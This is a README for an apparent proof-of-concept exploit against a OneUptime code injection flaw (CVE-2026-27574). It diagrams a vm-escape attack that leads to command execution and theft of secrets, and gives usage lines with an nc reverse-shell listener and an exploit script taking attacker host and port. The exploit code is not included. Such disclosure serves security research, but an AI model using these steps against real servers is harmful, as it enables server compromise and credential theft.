# CVE-2026-27574-OneUptime-RCE
![Author](https://img.shields.io/badge/Author-Mohammed%20Idrees%20Banyamer-red?style=for-the-badge&logoColor=white)
![Role](https://img.shields.io/badge/Role-Security%20Researcher-blue?style=for-the-badge&logoColor=white)
![Country](https://img.shields.io/badge/Country-Jordan-black?style=for-the-badge&logoColor=white)
![Platform](https://img.shields.io/badge/Platform-Linux-blue?style=for-the-badge&logoColor=white)
![Vulnerability](https://img.shields.io/badge/Vuln-Code%20Injection-critical?style=for-the-badge&logoColor=white)
![CVE](https://img.shields.io/badge/CVE-2026--27574-orange?style=for-the-badge&logoColor=white)
![CVSS](https://img.shields.io/badge/CVSS-9.9-critical?style=for-the-badge&logoColor=white)
![Status](https://img.shields.io/badge/Exploit-PoC-success?style=for-the-badge&logoColor=white)

</div>

## Overview

Proof-of-Concept exploit for **CVE-2026-27574** – a critical code injection vulnerability (CWE-94) in **OneUptime < 10.0.0** allowing arbitrary JavaScript execution in the probe context, leading to full **remote code execution (RCE)** and leakage of sensitive environment variables.

**Fixed in:** OneUptime 10.0.0 (migration to `isolated-vm`)

**Exploit type:** Remote  
**Authentication:** Low-privilege (any registered project member)  
**Impact:** Full server compromise, credential theft, cluster takeover

## Attack Flow Diagram

```mermaid
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]
```

## Features of This PoC

- Automatic account registration
- Project creation
- Malicious JavaScript monitor creation
- Environment variable leakage
- Basic command execution proof
- Optional reverse shell payload (commented)

## Usage

```bash
# Start listener (if using reverse shell)
nc -lvnp 4444

# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
```

## Requirements

- Python 3.6+
- `requests` library (`pip install requests`)

## Legal & Ethical Notice

**This code is provided for educational and authorized security testing purposes only.**  
Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

## References

- [GitHub Advisory GHSA-v264-xqh4-9xmm](https://github.com/OneUptime/oneuptime/security/advisories/GHSA-v264-xqh4-9xmm)
- [Patch Commit](https://github.com/OneUptime/oneuptime/commit/7f9ed4d43945574702a26b7c206e38cc344fe427)

---

<p align="center">
  <i>Developed by Mohammed Idrees Banyamer • Jordan • @banyamer_security</i>
</p>
